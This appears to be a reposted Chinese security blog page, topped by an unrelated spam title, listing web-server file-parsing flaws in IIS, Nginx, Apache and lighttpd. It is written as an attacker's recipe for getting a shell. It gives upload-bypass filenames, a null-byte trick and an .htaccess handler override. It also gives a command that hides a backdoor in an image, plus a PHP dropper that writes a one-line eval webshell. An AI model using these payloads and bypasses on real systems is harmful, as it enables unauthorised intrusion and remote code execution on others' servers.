压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

解析漏洞

  1. 目錄解析:/xx.asp/xx.jpg   xx.jpg可替換為任意文本文件(e.g. xx.txt),文本內(nèi)容為后門代碼。(或者在fider里面如果有topath的話嘗試,直接加目錄傳Jpg)

  比如 在網(wǎng)站下建立文件夾的名字為 .asp、.asa 的文件夾,其目錄內(nèi)的任何擴(kuò)展名的文件都被IIS當(dāng)作asp文件來(lái)解析并執(zhí)行。

  解析漏洞

  例如創(chuàng)建目錄 wooyun.asp,那么

  /wooyun.asp/1.jpg

  將被當(dāng)作asp文件來(lái)執(zhí)行。假設(shè)黑闊可以控制上傳文件夾路徑,就可以不管你上傳后你的圖片改不改名都能拿shell了。

  2.IIS6.0 會(huì)將 xx.jpg 解析為 asp 文件。

  在IIS6.0下,分號(hào)后面的不被解析,也就是說(shuō)

  wooyun.asp;.jpg  會(huì)被服務(wù)器看成是wooyun.asp

  后綴解析:/xx.asp;.jpg /xx.asp:.jpg(此處需抓包修改文件名)

  {/xx.asp:.jpg 此類文件在Windows下不允許存在,:.jpg被自動(dòng)除去,剩下/xx.asp}

  3.默認(rèn)解析:/xx.asa /xx.cer /xx.cdx

  IIS6.0 默認(rèn)的可執(zhí)行文件除了 asp 還包含這三種

  此處可聯(lián)系利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

  [+]IIS 7.0/IIS 7.5/Nginx <8.03

  IIS 7.0/IIS 7.5/Nginx <8.03

  在默認(rèn)Fast-CGI開啟狀況下,在一個(gè)文件路徑(/xx.jpg)后面加上/xx.php會(huì)將 /xx.jpg/xx.php 解析為 php 文件。

  常用利用方法: 將一張圖和一個(gè)寫入后門代碼的文本文件合并 將惡意文本寫入圖片的二進(jìn)制代碼之后,避免破壞圖片文件頭和尾

  e.g. copy xx.jpg/b + yy.txt/a xy.jpg

  /b 即二進(jìn)制[binary]模式

  /a 即ascii模式 xx.jpg正常圖片文件

  yy.txt 內(nèi)容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

  意思為寫入一個(gè)內(nèi)容為 <?php eval($_POST[cmd])?> 名稱為shell.php的文件

  找個(gè)地方上傳 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可執(zhí)行惡意文本。

  然后就在圖片目錄下生成一句話木馬 shell.php 密碼 cmd

  2. IIS7.5漏洞還包括,a.aspx.a;.a.aspx.jpg..jpg 以這種方式命名木馬文件。

  [+]Nginx <8.03

  在Fast-CGI關(guān)閉的情況下,Nginx <8.03依然存在解析漏洞

  在一個(gè)文件路徑(/xx.jpg)后面加上%00.php會(huì)將 /xx.jpg%00.php 解析為 php 文件。

  [+]Apache

  1.后綴解析:test.php.x1.x2.x3

  Apache將從右至左開始判斷后綴,若x3非可識(shí)別后綴,再判斷x2,直到找到可識(shí)別后綴為止,然后將該可識(shí)別后綴進(jìn)解析

  test.php.x1.x2.x3 則會(huì)被解析為php

  經(jīng)驗(yàn)之談:php|php3|phtml 多可被Apache解析

  2.Apache 是從右到左開始判斷解析,如果為不可識(shí)別解析,就再往左判斷.

  比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識(shí)別解析,apache就會(huì)把wooyun.php.owf.rar解析成php.

  如何判斷是不是合法的后綴就是這個(gè)漏洞的利用關(guān)鍵,測(cè)試時(shí)可以嘗試上傳一個(gè)wooyun.php.rara.jpg.png…(把你知道的常見(jiàn)后綴都寫上…)去測(cè)試是否是合法后綴

  [+]其他一些可利用的

  在windows環(huán)境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會(huì)默認(rèn)除去空格或點(diǎn),這也是可以被利用的!

  在向一臺(tái)windows主機(jī)上傳數(shù)據(jù)時(shí),你可以抓包修改文件名,在后面加個(gè)空格或點(diǎn),試圖繞過(guò)黑名單,若上傳成功,最后的點(diǎn)或空格都會(huì)被消除,這樣就可得到shell。

  我記得Fck Php 2.6就存在加空格繞過(guò)的漏洞。{Linux主機(jī)中不行,Linux允許這類文件存在}

  如果在Apache中.htaccess可被執(zhí)行(默認(rèn)不執(zhí)行,這是90sec里的一位朋友說(shuō)的,當(dāng)初我并不知道),且可以被上傳,

  那可以嘗試在.htaccess中寫入:

  <FilesMatch “shell.jpg”> SetHandler application/x-httpd-php </FilesMatch>

  shell.jpg換成你上傳的文件,這樣shell.jpg就可解析為php文件

  [+]lighttpd

  xx.jpg/xx.php

  [Add by loser]

  http://drops.wooyun.org/papers/539

  http://www.yunsec.net/a/security/web/jbst/2012/0903/11311.html

 

上一篇:安卓防火墻 PS DroidWall

下一篇:kali“安裝系統(tǒng)”失敗分析及解決